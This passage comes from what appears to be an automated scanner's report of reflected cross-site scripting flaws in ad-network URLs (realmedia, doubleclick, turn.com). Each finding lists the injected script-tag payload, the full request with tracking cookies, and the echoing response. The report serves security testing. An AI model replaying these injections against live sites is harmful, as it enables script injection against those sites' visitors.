Date: Sun, 20 Mar 2011 13:15:39 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 390
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0c45525d5f4f58455e445a4a423660;expires=Sun, 20-Mar-2011 13:16:39 GMT;path=/;httponly

<A HREF="http://network.realmedia.com/RealMedia/ads/click_lx.ads/TRACK_Mindsetmedia/Retarget_Secure/1012415516/Bottom3ebe66"><script>alert(1)</script>bb0eb5cc61d/default/empty.gif/726348573830316934646f4141767949?_RM_HTML_MM_=150105055115150005515" target="_top">
...[SNIP]...

1.124. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/766798645@Bottom3 [_RM_HTML_MM_ parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/766798645@Bottom3

Issue detail

The value of the _RM_HTML_MM_ request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7703"><script>alert(1)</script>05ee2b033b7 was submitted in the _RM_HTML_MM_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/766798645@Bottom3?_RM_HTML_MM_=150105055115150005515e7703"><script>alert(1)</script>05ee2b033b7 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://redcated/APM/iview/142856443/direct;wi.300;hi.250/01?click=http://viacom.adbureau.net/accipiter/adclick/CID=000014700000000000000000/height=250/width=300/site=SW.NOL/aamsz=300X250/NCP=1/relocate=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801i4doAAvyI; BCN2010110741=1; S247S=1; RMFL=011Pxp1fU10KeT; NXCLICK2=011Pxp1fNX_TRACK_Nationalgeographic/Retarget_Natgeorealhomepage_Nonsecure!y!B3!KeT!ppm3; RMFD=011Q1HsmO1016kC|O1016oi|O1016oj|O1016x1|O10170Y

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 13:10:35 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 398
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0f45525d5f4f58455e445a4a423660;expires=Sun, 20-Mar-2011 13:11:35 GMT;path=/;httponly

<A HREF="http://network.realmedia.com/RealMedia/ads/click_lx.ads/TRACK_Mindsetmedia/Retarget_Secure/1958482627/Bottom3/default/empty.gif/726348573830316934646f4141767949?_RM_HTML_MM_=150105055115150005515e7703"><script>alert(1)</script>05ee2b033b7" target="_top">
...[SNIP]...

1.125. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/766798645@Bottom3 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/766798645@Bottom3

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd05c"><script>alert(1)</script>62b066b0460 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/766798645@Bottom3?_RM_HTML_MM_=150105055115150005515&bd05c"><script>alert(1)</script>62b066b0460=1 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://redcated/APM/iview/142856443/direct;wi.300;hi.250/01?click=http://viacom.adbureau.net/accipiter/adclick/CID=000014700000000000000000/height=250/width=300/site=SW.NOL/aamsz=300X250/NCP=1/relocate=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801i4doAAvyI; BCN2010110741=1; S247S=1; RMFL=011Pxp1fU10KeT; NXCLICK2=011Pxp1fNX_TRACK_Nationalgeographic/Retarget_Natgeorealhomepage_Nonsecure!y!B3!KeT!ppm3; RMFD=011Q1HsmO1016kC|O1016oi|O1016oj|O1016x1|O10170Y

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 13:14:02 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 399
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0c45525d5f4f58455e445a4a423660;expires=Sun, 20-Mar-2011 13:15:02 GMT;path=/;httponly

<A HREF="http://network.realmedia.com/RealMedia/ads/click_lx.ads/TRACK_Mindsetmedia/Retarget_Secure/18678762/Bottom3/default/empty.gif/726348573830316934646f4141767949?_RM_HTML_MM_=150105055115150005515&bd05c"><script>alert(1)</script>62b066b0460=1" target="_top">
...[SNIP]...

1.126. http://pubads.g.doubleclick.net/gampad/ads [slotname parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pubads.g.doubleclick.net
Path:	/gampad/ads

Issue detail

The value of the slotname request parameter is copied into the HTML document as plain text between tags. The payload 2ebb0<script>alert(1)</script>ffa40386948 was submitted in the slotname parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gampad/ads?correlator=1300624474211&output=json_html&callback=GA_googleSetAdContentsBySlotForSync&impl=s&client=ca-pub-2332856072838068&slotname=woot-homeside1-300x2502ebb0<script>alert(1)</script>ffa40386948&page_slots=woot-homeside1-300x250&cookie_enabled=1&ga_vid=448747195.1300624474&ga_sid=1300624474&ga_hid=1077725119&url=http%3A%2F%2Fwww.woot.com%2F&lmt=1300642474&dt=1300624474218&cc=100&biw=1001&bih=900&ifi=1&adk=625104529&u_tz=-300&u_his=1&u_java=true&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&flash=10.2.154 HTTP/1.1
Host: pubads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.woot.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TMedia=Coun%3ANA/Postal%3ANA/; TMediaISP=SoftLayer%20Technologies; id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __utmz=251550727.1300542524.1.1.utmcsr=mgid.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=251550727.1167224488.1300542524.1300542524.1300542524.1

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 20 Mar 2011 12:39:13 GMT
Server: gfp-be
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 2749

GA_googleSetAdContentsBySlotForSync({"woot-homeside1-300x2502ebb0<script>alert(1)</script>ffa40386948":{"_type_":"html","_expandable_":false,"_html_":"\x3c!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01//EN\"\"http://www.w3.org/TR/html4/strict.dtd\"\x3e\x3chtml\x3e\x3chead\x3e\x3cstyle\x3ea:link{color:#0
...[SNIP]...

1.127. http://r.turn.com/r/tpclick/id/tm7NsgCBljeFlAgAcwABAA/3c/http:/ad.yieldmanager.com/clk [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://r.turn.com
Path:	/r/tpclick/id/tm7NsgCBljeFlAgAcwABAA/3c/http:/ad.yieldmanager.com/clk

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78b4f"><script>alert(1)</script>c7a8238580a was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /r/tpclick/id/tm7NsgCBljeFlAgAcwABAA/3c/http:78b4f"><script>alert(1)</script>c7a8238580a/ad.yieldmanager.com/clk HTTP/1.1
Host: r.turn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: uid=8392341830659049202; adImpCount=aWm1M4LjK5VIpxyiby4XYxEDYW1PshQ3vpBZa8uxHEph-L3XcPmT4hHXOQgApIlYh1NXgtHFGzzHzNFmm-KzX_9FnfDLNktuAMS6JsTomdlVpY3HjWkw231zQDelLH8_7MDefgoTZqF-bd3v_Qfs6OEZRtFGqduPVkD_gkg8VfV0ExsZAquLx2WiGNWvrnUszuICt27wBWASQBET6OeAytEy0WeBXOvyGLo3g2RyRxPMuJkSor3PooeE5HOb8MagG3H1Yh6KJus8Al0Tyl-_P0B_pSthw6Osds3vCU1DTz-z4otjDK2ixFI9HIYofu_jbt-1znRWuv4f0NnBSjg_DEGifQpKlSlg2JPncxaZQ7rJS-D340zJ0KEew_mwtQGaH27SKaSCTrWZJYQAanRpUpKgERJUW1YdGsZik0-okt7FAHdoDG0wmwYyeCzPe0spi39LGtEsLYa2RHjeXVKaXwxjz621UnXRIPElrss_9Bf3D5kPD76YDvIMjmnYUSqxgxaji_-otMFqmG9mmaQliekdOq3dCdMpBBYB6oxrLl9pdFEKrE3dKUxNz_PPP_A0oljWnUH_uUv0DheX3sKsfdGakli0ckXet5HgWuGAxOwjSx4LjXgDbmHu6Eh19fbovGRasNivyUiC-5nZMh1vJZclJZpWuXGcTDMvl_OekRPjS2MhCKHwMNU_BYoLCyOP7MDefgoTZqF-bd3v_Qfs6KVd2oSKolIwwEiITDQU2Lx0ExsZAquLx2WiGNWvrnUsd_PYU2DwATVpcslEDyf8hqiet1AIT80-jJlBpoUU7boLVM3uUWyLgHu6saG6i5PsBUqFp4KiueJFiSLkI0xYhQXlpwfxpWQdK7j4LVji2FVRCmp-Ng4uMeq-zvqbvux36ic_sEQwn-Xt_ClqlX8t_6DGXbcfdjdN_4BNnqMpaZCNRQCl9OpEhGua7KdmVMA9H27SKaSCTrWZJYQAanRpUjDmKTcPQFqbSQ5GlElX4-OPXp3pozvJlBPwzvc_9CbX0Eax0_okMfml7XV2gTBl77zbnfMNJ_ejhUj1ijcB8BL3D5kPD76YDvIMjmnYUSqxVTm50zwheMZKXjYTELCaRTMB1dlAsjcT9rVrLvj2jmVUL-jDhuW_PG6kDXW49rX2tzfWChaLz8qHVMsj8mXTQ5X_BsIvcSN0BmMTK-BlFS19ozX7FlWqx06TTt3zJMoidpDfoquYgeQVRQJMAHbPNzKbdG5BDLNqFInvCReDtR22Ma4NnjcBIUkCx_bHhhCO7MDefgoTZqF-bd3v_Qfs6BrVkQpn3sMfisSjNFR6Lph0ExsZAquLx2WiGNWvrnUsxG4zdt6QMXamb0MlO9-6e1Et3epiS-kFwEUk3ma5DYQLVM3uUWyLgHu6saG6i5PsCif1zoSmfZSqcudOf2tI_AtUze5RbIuAe7qxobqLk-whOajgwxbhQ2etCzicpyVTBeWnB_GlZB0ruPgtWOLYVT4g_J2kF4TffMfKOos7tSGYqdD0JO4s0XymPmMJRJDcQaJ9CkqVKWDYk-dzFplDuqwCXV-t7S-pFZ84tfYt394fbtIppIJOtZklhABqdGlSk3kOykyDTiOMXrl_1hSXbVPgP28vTqELfpOybpGjlbL1u2jaCL-G-9iQxe-i1zj0qnIvgJ1Cs1GitaawX0kTqPcPmQ8PvpgO8gyOadhRKrGUhUdZl_uWemjmxoBkqtZPlC4l-GnLAeLfqIKDfL1UZBu13BiEoKhy1nfBN8OlmthGyJL9eBp3R0ktcXzadt6Dlf8Gwi9xI3QGYxMr4GUVLSGbq4jqoA2S5xXIqloiZ1rJnlvqvTZp82d7AV1or2dUFOEFVYJjQMgMb7lS0C-xbKEPGbIcW-yfL1eczIB0nv7swN5-ChNmoX5t3e_9B-zo4ADEFwcAd4j4QaxZfExMqHQTGxkCq4vHZaIY1a-udSxde4MjDw009tPzSo6eSSgxdwNGJND06t-bjtn5J7KDlQtUze5RbIuAe7qxobqLk-zD_xVADK1Q9dfnRiJgoiDiBeWnB_GlZB0ruPgtWOLYVWRtxKwDSHoQbxPxzfXop_PGqBSQ6KpYW-OwrvDg8i80oMZdtx92N03_gE2eoylpkOa03F8PGEVyWKeOTLdjQBsfbtIppIJOtZklhABqdGlSTAOVu8HAwVUaLipJ9sHGrk8xcWupMSKM_8JiETgP7y2Lf0sa0SwthrZEeN5dUppfBHqNpdRWaYXKfEufY1_jM_cPmQ8PvpgO8gyOadhRKrEH2jhGaC4HJh3Lvv-bHhjZXJrqY1uo21_GLL5pntP7d1Qv6MOG5b88bqQNdbj2tfZUQpq4yPuFsSVWlf6dSHtGLEWhr4abofxDhC7P6sGwew4euBkqrCOJYGXaH5f2No8_2RdAhJaMbFOWHdRsIhatZ3trG8hf0eQqY8g-UGnErVl0dXhBHCfFaURcg86EWtLlFbsvCmEPdz0GvB-V7jB5awi2yagXokGer-T3duHYImsItsmoF6JBnq_k93bh2CJrCLbJqBeiQZ6v5Pd24dgi0fy9yH3cJpXYWOo6nSGwttH8vch93CaV2FjqOp0hsLaOT-BQHXXH-uznhhEs9x_Sw0tfzF6HcwwheEdKac2B-sNLX8xeh3MMIXhHSmnNgfoM2KaPI-sR5WE58gV6S3h5xnv5U9q3RmUdEcfcdtut4fcJCZU_BttKMXTDyrBfshtsU5_j_mocn2P_zfZY4qmabFOf4_5qHJ9j_832WOKpmug_cxXaULqo5K_--uRzgNIR8R--H-SzG21IeFe3_WqV2oTj14ksQ27ZtJZzx1gXZNqE49eJLENu2bSWc8dYF2TahOPXiSxDbtm0lnPHWBdk9C_Pu3wPYr2A_3dDgXogwmd09iZDTMtxv05d2hJrzm1ndPYmQ0zLcb9OXdoSa85tfCWfACzyR22c78m9rm0opXwlnwAs8kdtnO_Jva5tKKWGDrBTI6MoEsB4IrTcND0RHO90Ba4DNelbdwYVufELDtX6BfAY2sgFWzSh0EbYcfTBpmpd9hwiXKZXJsWFQCQVBsjiFrNHSK-_Gebf3rUW-DiUdeTQauTko8JT6bU5H7U4lHXk0Grk5KPCU-m1OR-1OJR15NBq5OSjwlPptTkftTiUdeTQauTko8JT6bU5H7WBDZuAVb1fiTqGwbz13XI0gQ2bgFW9X4k6hsG89d1yNIENm4BVvV-JOobBvPXdcjQoc_EAqGm2Vr9TWaHYU9GddhjhUYi9yiSqjz4yirqEttGX0otsn1Eo9ASeAp22-RzCmJKLA4L8yqghdd3XRDx7qf1MrHd4wjjnlzZT7-OanKn9TKx3eMI455c2U-_jmpyp_Uysd3jCOOeXNlPv45qc4FfPONitGRcGxKttYjNpmYIlBZfRYA7Tno9giphEEaGCJQWX0WAO056PYIqYRBGhxo3TegpnNfA0YZyu_rcByep30ZvJV6vlji6z2sRrikTqd9GbyVer5Y4us9rEa4pE6nfRm8lXq-WOLrPaxGuKROp30ZvJV6vlji6z2sRrikRAeKyhQvuA1Am1Hf99RKswWh2QKPH2KLJ2oGR8lOZM1ANe8zLs_kHddS6hlrOxdDk; rds=15054%7C15054%7C15054%7C15050%7Cundefined%7C15054%7C15054%7C15038%7C15054%7C15054%7C15054%7C15054%7Cundefined%7C15054%7C15050%7C15054; pf=QNmKTCt50B8Kpjg3isR9W_Ir3yoWOiSMkKJqMqoVPY2F1SOb8aRLeTLNl-G3fsUKhUysT6tP_1ec7xFTzmyTOvZhkC75wKwc88nuAokFvQ9ZYY2MlOzDLPTu4F-Uvdt_4YcdqwNhq09cj3lKBwXbCI3NqI2oQask0RxIcweDv6GMvGOoSAiXlEejBUI4bVTZiG0CD7SN4iQwbZFOht5_PcUKhyzjZJcScR_VHmzU_n_fhPhtP5eGOnqRNnt1-OV92xXlB7VgscrJbhGIf_JilPRDCeImrEZCGkpU4h_63CxWG5zEusESadpgYRYL2p5MG_RdoPtoKDEjrNYQG7__lKjDMABh_QQeaoDba2RSMKg6e-hV0PbjfU-R5RsfY_iXHHJjlc65ejsfGk_Bhi8TLHmektSTNGWFbueds9H23VJFfVN5kj-_puNaGveyJPzS0OWMGE9a6E0drdXZhYMeXsC4vcynPn9Dotf0EEwoLz7AbGDzP165MyHrx4tSx2B8O9qIPoIdnpPJQCQT3fsKxMAWYsdDJ5k_sdNi8uFJSCQ255k6vYnNOgM7sltoObfRe7Nfdm5bvla8XcCi8mpJcxR9SWcdexG9cU6HZV_VJhdn40SIet0iwwqKbdSj4CL2bkG8vxygw5PYjAzgbfXuQGcN6QW2n8XRLy7UoAmSdBRnwSKp2TDgd2Lcz_qJvz2UQIXGjoBZ78Wshqhm4tb0CSAVFfu30wLyYuo1y7aS82LTLnxA3ggK2gyTUssar2d0VZEEXq24P2id3ypkSYZxDaGrEW4mATCBJcdbUsS6U6WlB0V5Jnrj8cA_1KNYNCmayGOF0nn5E6TLc-A2frbzWLZ78bJLnb6L0KoAtnvLV2pP81X4ANdqArViOJeQtd_KBgfW6zrQLmaDIleZdb-lWXaspIKRhbM6EZgcd53-A29aOa0ye1UD40069XkSXwnuCh-RAXxtefbOimbdrtxWQwySgP2B497OTuJjk4h_xz7h1RsCnD2sD6SzTA6FS0L5qaDwuUB-gusjbKGTbdorNQKIus_NVuwacB_n_GJkCjDeRWnTTHOTAUzRX7jz2Dtha6IYgwK4KHy8_huNe8GKEihRoyUkOlvRlegTV48BDCOJkf60Zr6_RPbt9P03q9zqXbkMIiHhRyraLmWVTI7LPDO0V_cWY7-ccITIWG4cEAVOX3OaMNRzdBC4-0RsvFyXuRiJhp9j10eguQj26V8UKLkQP0cLS8-CaS_G0biaU-lkiE1m1Xn_hKe9NfZLnwyCK2ncrj6VabuuuFr6c_o5qaCQ6oN7sH1l3MIGQoK8X6stp0kTmdEXBwprTQawoH105HoGs1Q83lthTB7Fi-VTyyXy_vCtpJySQt4PX48ZzIpuwEShzbmTtAHP6iCkM-HhsMYZ7YWC2tZwu4Tb45eBwQ2XRr6BMB9fSsap5sDS6rpQ2bGi-sM44BgEdgBbOlmMluxfbyihgyJXJzx1jJXLpuPXHdjanaO2pJ8yqKNT5UMTIw2oYtTZbgmSLFmFfbvQzRfufLqyfgPcMtBAkmyxKq4X6cfi80nt471PDAY1h5rLy4hs1GeJifs51BsOk2bX; rv=1; rrs=1%7C2%7C3%7C4%7Cundefined%7C6%7C7%7C8%7C9%7C1001%7C1002%7C1003%7Cundefined%7C1004%7C1005%7C12; fc=k01_H3DQgin2gUWbqEfHVnEgVJOySuH7g303wn-3ThPBhSQ9y8oNWj2jHjllm2qL9SGC6KvWqijMODBe-PTw-vVibMqUG0iKKCPAs_vD_eA0A7iP8ARnu5R4osC1ayLKRfOX1MD02-o6SZ1b0c_HcdJnnDxsS-ubYBpridlzat8;

Response (redirected)

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Date: Sun, 20 Mar 2011 14:01:53 GMT
Connection: close

<html>
<script type="text/javascript">
   function processAdClickUrl() {
       window.top.location.replace("");
   }
</script>
<body>
<img height=0 width=0 style="visibility:hidden" src="http:78b4f"><script>alert(1)</script>c7a8238580a/ad.yieldmanager.com/clk" onerror="processAdClickUrl();" onload="processAdClickUrl();">
...[SNIP]...

1.128. http://r.turn.com/r/tpclick/id/tm7NsgCBljeFlAgAcwABAA/3c/http:/ad.yieldmanager.com/clk [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://r.turn.com
Path:	/r/tpclick/id/tm7NsgCBljeFlAgAcwABAA/3c/http:/ad.yieldmanager.com/clk

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1eb6e"><script>alert(1)</script>dcf94b4096f was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /r/tpclick/id/tm7NsgCBljeFlAgAcwABAA/3c/http:/ad.yieldmanager.com1eb6e"><script>alert(1)</script>dcf94b4096f/clk HTTP/1.1
Host: r.turn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: uid=8392341830659049202; adImpCount=aWm1M4LjK5VIpxyiby4XYxEDYW1PshQ3vpBZa8uxHEph-L3XcPmT4hHXOQgApIlYh1NXgtHFGzzHzNFmm-KzX_9FnfDLNktuAMS6JsTomdlVpY3HjWkw231zQDelLH8_7MDefgoTZqF-bd3v_Qfs6OEZRtFGqduPVkD_gkg8VfV0ExsZAquLx2WiGNWvrnUszuICt27wBWASQBET6OeAytEy0WeBXOvyGLo3g2RyRxPMuJkSor3PooeE5HOb8MagG3H1Yh6KJus8Al0Tyl-_P0B_pSthw6Osds3vCU1DTz-z4otjDK2ixFI9HIYofu_jbt-1znRWuv4f0NnBSjg_DEGifQpKlSlg2JPncxaZQ7rJS-D340zJ0KEew_mwtQGaH27SKaSCTrWZJYQAanRpUpKgERJUW1YdGsZik0-okt7FAHdoDG0wmwYyeCzPe0spi39LGtEsLYa2RHjeXVKaXwxjz621UnXRIPElrss_9Bf3D5kPD76YDvIMjmnYUSqxgxaji_-otMFqmG9mmaQliekdOq3dCdMpBBYB6oxrLl9pdFEKrE3dKUxNz_PPP_A0oljWnUH_uUv0DheX3sKsfdGakli0ckXet5HgWuGAxOwjSx4LjXgDbmHu6Eh19fbovGRasNivyUiC-5nZMh1vJZclJZpWuXGcTDMvl_OekRPjS2MhCKHwMNU_BYoLCyOP7MDefgoTZqF-bd3v_Qfs6KVd2oSKolIwwEiITDQU2Lx0ExsZAquLx2WiGNWvrnUsd_PYU2DwATVpcslEDyf8hqiet1AIT80-jJlBpoUU7boLVM3uUWyLgHu6saG6i5PsBUqFp4KiueJFiSLkI0xYhQXlpwfxpWQdK7j4LVji2FVRCmp-Ng4uMeq-zvqbvux36ic_sEQwn-Xt_ClqlX8t_6DGXbcfdjdN_4BNnqMpaZCNRQCl9OpEhGua7KdmVMA9H27SKaSCTrWZJYQAanRpUjDmKTcPQFqbSQ5GlElX4-OPXp3pozvJlBPwzvc_9CbX0Eax0_okMfml7XV2gTBl77zbnfMNJ_ejhUj1ijcB8BL3D5kPD76YDvIMjmnYUSqxVTm50zwheMZKXjYTELCaRTMB1dlAsjcT9rVrLvj2jmVUL-jDhuW_PG6kDXW49rX2tzfWChaLz8qHVMsj8mXTQ5X_BsIvcSN0BmMTK-BlFS19ozX7FlWqx06TTt3zJMoidpDfoquYgeQVRQJMAHbPNzKbdG5BDLNqFInvCReDtR22Ma4NnjcBIUkCx_bHhhCO7MDefgoTZqF-bd3v_Qfs6BrVkQpn3sMfisSjNFR6Lph0ExsZAquLx2WiGNWvrnUsxG4zdt6QMXamb0MlO9-6e1Et3epiS-kFwEUk3ma5DYQLVM3uUWyLgHu6saG6i5PsCif1zoSmfZSqcudOf2tI_AtUze5RbIuAe7qxobqLk-whOajgwxbhQ2etCzicpyVTBeWnB_GlZB0ruPgtWOLYVT4g_J2kF4TffMfKOos7tSGYqdD0JO4s0XymPmMJRJDcQaJ9CkqVKWDYk-dzFplDuqwCXV-t7S-pFZ84tfYt394fbtIppIJOtZklhABqdGlSk3kOykyDTiOMXrl_1hSXbVPgP28vTqELfpOybpGjlbL1u2jaCL-G-9iQxe-i1zj0qnIvgJ1Cs1GitaawX0kTqPcPmQ8PvpgO8gyOadhRKrGUhUdZl_uWemjmxoBkqtZPlC4l-GnLAeLfqIKDfL1UZBu13BiEoKhy1nfBN8OlmthGyJL9eBp3R0ktcXzadt6Dlf8Gwi9xI3QGYxMr4GUVLSGbq4jqoA2S5xXIqloiZ1rJnlvqvTZp82d7AV1or2dUFOEFVYJjQMgMb7lS0C-xbKEPGbIcW-yfL1eczIB0nv7swN5-ChNmoX5t3e_9B-zo4ADEFwcAd4j4QaxZfExMqHQTGxkCq4vHZaIY1a-udSxde4MjDw009tPzSo6eSSgxdwNGJND06t-bjtn5J7KDlQtUze5RbIuAe7qxobqLk-zD_xVADK1Q9dfnRiJgoiDiBeWnB_GlZB0ruPgtWOLYVWRtxKwDSHoQbxPxzfXop_PGqBSQ6KpYW-OwrvDg8i80oMZdtx92N03_gE2eoylpkOa03F8PGEVyWKeOTLdjQBsfbtIppIJOtZklhABqdGlSTAOVu8HAwVUaLipJ9sHGrk8xcWupMSKM_8JiETgP7y2Lf0sa0SwthrZEeN5dUppfBHqNpdRWaYXKfEufY1_jM_cPmQ8PvpgO8gyOadhRKrEH2jhGaC4HJh3Lvv-bHhjZXJrqY1uo21_GLL5pntP7d1Qv6MOG5b88bqQNdbj2tfZUQpq4yPuFsSVWlf6dSHtGLEWhr4abofxDhC7P6sGwew4euBkqrCOJYGXaH5f2No8_2RdAhJaMbFOWHdRsIhatZ3trG8hf0eQqY8g-UGnErVl0dXhBHCfFaURcg86EWtLlFbsvCmEPdz0GvB-V7jB5awi2yagXokGer-T3duHYImsItsmoF6JBnq_k93bh2CJrCLbJqBeiQZ6v5Pd24dgi0fy9yH3cJpXYWOo6nSGwttH8vch93CaV2FjqOp0hsLaOT-BQHXXH-uznhhEs9x_Sw0tfzF6HcwwheEdKac2B-sNLX8xeh3MMIXhHSmnNgfoM2KaPI-sR5WE58gV6S3h5xnv5U9q3RmUdEcfcdtut4fcJCZU_BttKMXTDyrBfshtsU5_j_mocn2P_zfZY4qmabFOf4_5qHJ9j_832WOKpmug_cxXaULqo5K_--uRzgNIR8R--H-SzG21IeFe3_WqV2oTj14ksQ27ZtJZzx1gXZNqE49eJLENu2bSWc8dYF2TahOPXiSxDbtm0lnPHWBdk9C_Pu3wPYr2A_3dDgXogwmd09iZDTMtxv05d2hJrzm1ndPYmQ0zLcb9OXdoSa85tfCWfACzyR22c78m9rm0opXwlnwAs8kdtnO_Jva5tKKWGDrBTI6MoEsB4IrTcND0RHO90Ba4DNelbdwYVufELDtX6BfAY2sgFWzSh0EbYcfTBpmpd9hwiXKZXJsWFQCQVBsjiFrNHSK-_Gebf3rUW-DiUdeTQauTko8JT6bU5H7U4lHXk0Grk5KPCU-m1OR-1OJR15NBq5OSjwlPptTkftTiUdeTQauTko8JT6bU5H7WBDZuAVb1fiTqGwbz13XI0gQ2bgFW9X4k6hsG89d1yNIENm4BVvV-JOobBvPXdcjQoc_EAqGm2Vr9TWaHYU9GddhjhUYi9yiSqjz4yirqEttGX0otsn1Eo9ASeAp22-RzCmJKLA4L8yqghdd3XRDx7qf1MrHd4wjjnlzZT7-OanKn9TKx3eMI455c2U-_jmpyp_Uysd3jCOOeXNlPv45qc4FfPONitGRcGxKttYjNpmYIlBZfRYA7Tno9giphEEaGCJQWX0WAO056PYIqYRBGhxo3TegpnNfA0YZyu_rcByep30ZvJV6vlji6z2sRrikTqd9GbyVer5Y4us9rEa4pE6nfRm8lXq-WOLrPaxGuKROp30ZvJV6vlji6z2sRrikRAeKyhQvuA1Am1Hf99RKswWh2QKPH2KLJ2oGR8lOZM1ANe8zLs_kHddS6hlrOxdDk; rds=15054%7C15054%7C15054%7C15050%7Cundefined%7C15054%7C15054%7C15038%7C15054%7C15054%7C15054%7C15054%7Cundefined%7C15054%7C15050%7C15054; 